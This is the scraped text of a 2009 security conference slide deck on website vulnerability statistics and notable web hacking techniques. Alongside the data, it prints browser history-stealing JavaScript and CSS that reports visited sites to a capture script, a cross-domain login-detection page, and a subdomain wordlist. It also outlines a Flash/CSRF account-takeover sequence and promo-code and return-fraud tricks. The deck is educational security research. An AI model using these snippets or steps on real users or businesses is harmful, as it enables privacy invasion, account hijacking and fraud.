View
220
Download
0
Category
Preview:
Citation preview
Web Application Vulnerability Analysis
SANS What Works06.02.2009
Jeremiah GrossmanFounder & Chief Technology Officer
© 2009 WhiteHat, Inc. | Page
Jeremiah Grossman
• WhiteHat Security Founder & CTO• Technology R&D and industry evangelist
(InfoWorld's CTO Top 25 for 2007)• Frequent international conference speaker• Co-founder of the Web Application Security Consortium• Co-author: Cross-Site Scripting Attacks• Former Yahoo! information security officer
2
© 2009 WhiteHat, Inc. | Page
WhiteHat Security - Website Risk Management• WhiteHat Sentinel Service
• Unlimited website vulnerability assessment
• SaaS-based, annual subscription model• Proprietary scanning technology and expert operations team
• 200+ enterprise customers• 1000’s of assessments performed annually from start-ups to Fortune 500
Sentinel PE - Configured assessment delivery including comprehensive manual testing for business logic issues. For high-risk websites with sensitive data and performs critical business functions.
Sentinel SE - Configured assessment delivery with verified vulnerability reporting – designed for medium risk websites with complex functionality requiring extensive configuration.
Sentinel BE - Self-service, automated assessment delivery with verified vulnerability reporting – designed for smaller, less complex, lower risk websites.
© 2009 WhiteHat, Inc. | Page 4
Data Set• Collection duration: January 1, 2006 to March 31, 2009• Total websites: 1,031• Identified vulnerabilities (custom web applications): 17,888• Assessment frequency: ~Weekly• Vulnerability classes: WASC Threat Classification• Severity naming convention: PCI-DSS
Key Findings• Unresolved vulnerabilities: 7,157 (60% resolution rate)• Websites having had at least one HIGH, CRITICAL, or URGENT issue: 82%• Lifetime average number of vulnerabilities per website: 17• Websites currently with at least one HIGH, CRITICAL, or URGENT issue: 63%• Current average of unresolved vulnerabilities per website: 7
Percentage likelihood of a website having a vulnerability by severity
URGENTHIGHCRITICAL
© 2009 WhiteHat, Inc. | Page 5
Cross-Site ScriptingInformation LeakageContent SpoofingInsufficient AuthorizationSQL InjectionPredictable Resource LocationSession FixationCross-Site Request ForgeryInsufficient AuthenticationHTTP Response Splitting
WhiteHat Security Top Ten
Percentage likelihood of a website having a vulnerability by class
• Average number of inputs per website: 227• Average ratio of vulnerability count / number of inputs: 2.58%
© 2009 WhiteHat, Inc. | Page
Time-to-Fix (Days) - WhiteHat Top Ten
6
Best-case scenario: Not all vulnerabilities have been fixed...
Cross-Site Scripting
Information Leakage
Content Spoofing
Insufficient Authorization
SQL Injection
Predictable Resource Location
Session Fixation
Cross-Site Request Forgery
Insufficient Authentication
HTTP Response Splitting
© 2009 WhiteHat, Inc. | Page
Resolution rate - Top 5 by Severity
7
Class of Attack % resolved severityCross Site Scripting 20% urgentInsufficient Authorization 19% urgentSQL Injection 30% urgentHTTP Response Splitting 75% urgentDirectory Traversal 53% urgentInsufficient Authentication 38% criticalCross-Site Scripting 39% criticalAbuse of Functionality 28% criticalCross-Site Request Forgery 45% criticalSession Fixation 21% criticalBrute Force 11% highContent Spoofing 25% highHTTP Response Splitting 30% highInformation Leakage 29% highPredictable Resource Location 26% high
Attacks can penetrate the intranet by controlling/hijacking a user’s browser and using JavaScript Malware, which is on the inside of the network.
Intranet Hacking
© 2009 WhiteHat, Inc. | Page 9
History Stealing Using Java and CSS
document.body.appendChild(l);var c = document.defaultView.getComputedStyle(l,null).getPropertyValue("color");document.body.removeChild(l);
// check for visitedif (c == "rgb(0, 0, 255)") { // visited
} else { // not visited
} // end visited check
Cycles through thousands of URLs checking the link color.
Common intranet hostnames make good targets as well...
© 2009 WhiteHat, Inc. | Page 10
History Stealing Using Java and CSS
<html><style>#links a:visited { color: #ff00ff;}#links a:visited#link1 { background: url('/capture.cgi?login.yahoo.com');}#links a:visited#link2 { background: url('/capture.cgi?mail.google.com');}#links a:visited#link3 { background: url('/capture.cgi?mail.yahoo.com');}</style><body>
<ul id="links"><li><a id="link1" href="http://login.yahoo.com/">http://login.yahoo.com/</a></li><li><a id="link2" href="http://mail.google.com/">http://mail.google.com/</a></li><li><a id="link3" href="http://mail.yahoo.com/">http://mail.yahoo.com/</a></li></ul>
</body></html>
Cycle through the same URLs, NoScript won’t help.
© 2009 WhiteHat, Inc. | Page
http://ha.ckers.org/fierce/hosts.txt001020311011121314151617181922033com456789ILMIaa.auth-nsa01a02a1a2abcaboutacacademicoaccesoaccessaccountingaccountsacidactivestatad
adamadkitadminadministracionadministradoradministratoradministratorsadminsadsadserveradslaeafaffiliateaffiliatesafiliadosagagendaagentaiaixajaxakakamaialalabamaalaskaalbuquerquealertsalphaalterwindamamarilloamericasananaheimanalyzerannounceannouncementsantivirusaoapapache
apolloappapp01app1appleapplicationapplicationsappsappserveraqararchiearcsightargentinaarizonaarkansasarlingtonasas400asiaasterixatathenaatlantaatlasattauauctionaustinauthautoavawayudaazbb.auth-nsb01b02b1b2b2bb2c
babackbackendbackupbakerbakersfieldbalancebalancerbaltimorebankingbayareabbbbddbbsbdbdcbebeabetabfbgbhbibillingbizbiztalkbjblackblackberryblogblogsbluebmbnbncbobobbofboisebolsaborderbostonboulder
boybrbravobrazilbritianbroadcastbrokerbronzebrownbsbsdbsd0bsd01bsd02bsd1bsd2btbugbuggalobugsbugzillabuildbulletinsburnburnerbuscadorbuybvbwbybzcc.auth-nscacachecafecalendarcaliforniacallcalvincanadacanalcanon
careerscatalogcccdcdburnercdncertcertificatescertifycertservcertsrvcfcgcgichchannelchannelscharliecharlottechatchatschatservercheckcheckpointchichicagocicimscincinnaticiscocitrixckclclassclassesclassifiedsclassroomclevelandclicktrackclientclientesclientsclub
clubsclusterclusterscmcmailcmscncococoacodecoldfusioncolombuscoloradocolumbuscomcommercecommerceservercommunigatecommunitycompaqcomprasconconcentratorconfconferenceconferencingconfidentialconnectconnecticutconsolaconsoleconsultconsultantconsultantsconsultingconsumercontactcontentcontractscorecore0core01corp
corpmailcorporatecorreocorreowebcortafuegoscounterstrikecoursescrcricketcrmcrscscsocssctcucust1cust10cust100cust101cust102cust103cust104cust105cust106cust107cust108cust109cust11cust110cust111cust112cust113cust114cust115cust116cust117cust118cust119cust12cust120cust121cust122
cvcvscxcyczddallasdatadatabasedatabase01database02database1database2databasesdatastoredatosdaviddbdb0db01db02db1db2dcdedealersdecdefdefaultdefiantdelawaredelldeltadelta1demodemonstrationdemosdenverdepotdesdesarrollodescargasdesign
documentaciondocumentosdomaindomainsdominiodominodominowebdoomdownloaddownloadsdowntowndragondrupaldsldyndynamicdynipdzee-come-commercee0eagleeartheastecechoecomecommerceediedueducationedwardeeegehejemploelpasoemailemployeesempresaempresasen
mailintranetHRexchangerouter
© 2009 WhiteHat, Inc. | Page
Login Detection via Authenticated CSSPerform a cross-domain load of a stylesheet and then reading property values using standard Javascript APIs. What makes it work on so many sites is that browsers will load inline style definitions from HTML documents. In addition, stylesheet properties differ wildly depending on whether a user is logged in or not.
<html><head><link rel="stylesheet" href="http://home.myspace.com/index.cfm?fuseaction=user"/><script>function func() {var ele = document.getElementById('blah');alert(window.getComputedStyle(ele, null).getPropertyValue('margin-bottom'));}</script></head><body onload="func()"><div id="blah" class="show"></body></html>
12
http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html
A content ownership issue taking advantage of flimsy security controls on both the server side and the client side.
Insecure Content Ownership
© 2009 WhiteHat, Inc. | Page
GIFAR
14
Appending a Java Applet (in the form of a JAR) at the end of another file that would be commonly allowed in file uploads on web applications, such as images, word documents, audio/video files, just about anything.
http://riosec.com/how-to-create-a-gifarhttp://xs-sniper.com/blog/2008/12/17/sun-fixes-gifars/http://blogs.zdnet.com/security/?p=1619
JAR
GIF
© 2009 WhiteHat, Inc. | Page
Gmail,YouTube, Flash, and CSRF Oh my!
15
http://www.youtube.com/crossdomain.xml<cross-domain-policy><allow-access-from domain="*.youtube.com"/><allow-access-from domain="*.ytimg.com"/><allow-access-from domain="*.google.com"/></cross-domain-policy>
http://jeremiahgrossman.blogspot.com/2008/09/i-used-to-know-what-you-watched-on.html
© 2009 WhiteHat, Inc. | Page
I know what you watch
16
1) Attacker emails a special SWF to a Gmail account they control and locates the attachment download URL on google.com.2) Logged-in YouTube user visits an attacker controlled page3) Attacker forces their victim to authenticate to the attackers Gmail account (identify misbinding / CSRF).4) Attacker embeds SWF from the Gmail account into the web page5) Attacker now has read write access on YouTube.com as the victim's account.
Flash Parameter Injection introduces a new way to inject values to global parameters in Flash movies while the movie is embedded in it's original HTML environment. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. This can lead to more elaborate attacks that take advantage of the interaction between the Flash movie and the HTML page in which it is embedded.
Flash Parameter Injection
© 2009 WhiteHat, Inc. | Page
Top Ten Web Hacking Techniques (2008)
How it worksThere are several different FPI variants. Most of the variants include tricking the server into sending back a page where user input is interpreted as Flash parameters. This allows an attacker to inject malicious global parameters to the Flash movie and exploit Flash specific vulnerabilities.
18
ActionScript 2 code reading a global variable
© 2009 WhiteHat, Inc. | Page
Top Ten Web Hacking Techniques (2008)
19
Passing arguments in an embedded URI
Passing arguments using 'flashvars'
DOM-based Flash parameter injection
© 2009 WhiteHat, Inc. | Page
Top Ten Web Hacking Techniques (2008)
20
Persistent Flash Parameter Injection
Online advertising campaigns distribute coupon and promo codes redeemable for discounts and other freebies. Some codes are more valuable than others.
Promo codes for cheapskates
© 2009 WhiteHat, Inc. | Page
•X% and $X off sales•Free Shipping•2 for 1 Specials•Add-Ons & Upgrades
22
© 2009 WhiteHat, Inc. | Page 23
MacWorld Hacker VIP
http://grutztopia.jingojango.net/2007/01/your-free-macworld-expo-platinum-pass_11.htmlhttp://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum-pass-yes.htmlhttp://grutztopia.jingojango.net/2008/02/your-client-side-security-sucks.html
Client-Side HackingBack to Back Free MacWorld Platinum Pass ($1,695)
© 2009 WhiteHat, Inc. | Page 24
Free Pizza Tastes Better
March 31, 2009...
1. Go to the Domino's Pizza site.2. Order a medium one-topping pizza.3. Enter coupon code “BAILOUT”. FREE!
Still have to go pick it up!
© 2009 WhiteHat, Inc. | Page 25
Share the Knowledge
11,000 X $7.00 =
$70,000
http://consumerist.com/5193012/dominos-accidentally-gives-away-11000-pizzas-in-bailout-promotionhttp://news.cnet.com/8301-13845_3-10207986-58.htmlhttp://offtopics.com/sales-coupons-promo-codes/1797-free-papa-johns-pizza-coupon-code-hack.html
“Spoke to a Domino's rep, who told me the free-pizza code was created internally for a promotion that was never actually green-lit.”
Oops!
© 2009 WhiteHat, Inc. | Page
Other Tricks
26
•Guess / Brute Force • (No CAPTCHAs)
•Stacking Multiple Codes•Delete Cookies (Don’t Forget Flash)
Sometimes electronics break or are defective and customers would like to return the item. Online systems are designed to facilitate this process.
iCan fix you iPod
© 2009 WhiteHat, Inc. | Page 28
Nicholas Arthur Woodhams, 23 from Kalamazoo, Michigan sets up shop online to repair iPods.
Abuse Apple's Advance Replacement Program by guessing iPod serial numbers backed with Visa-branded gift cards ($1 pre-auth).
Repeat the process 9,075 times, resell the “replacements” at heavily discounted prices ($$49), and deny any Apple credit charges.
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9130136&intsrc=news_ts_headhttp://www.macworld.com/article/139522/23yearold_michigan_man_busted_for_ipod_fraud.htmlhttp://www.appleinsider.com/articles/08/06/26/apple_makes_example_of_ipod_repairman_in_lawsuit.htmlhttp://launderingmoney.blogspot.com/2009/03/money-laundering-charges-for-kalamazoo.html
Charged with trademark infringement, fraud, and money-laundering.
© 2009 WhiteHat, Inc. | Page
Scams that scale
“Federal prosecutors have asked U.S. District Court Judge Robert Bell to let them seize real estate and personal property -- including a 2004 Audi and a 2006 drag racer -- as well as more than $571,000 in cash belonging to Woodhams, all alleged to be proceeds from his scam.”
29
Jeremiah GrossmanBlog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: jeremiah@whitehatsec.com
WhiteHat Securityhttp://www.whitehatsec.com/
Thank You!
Recommended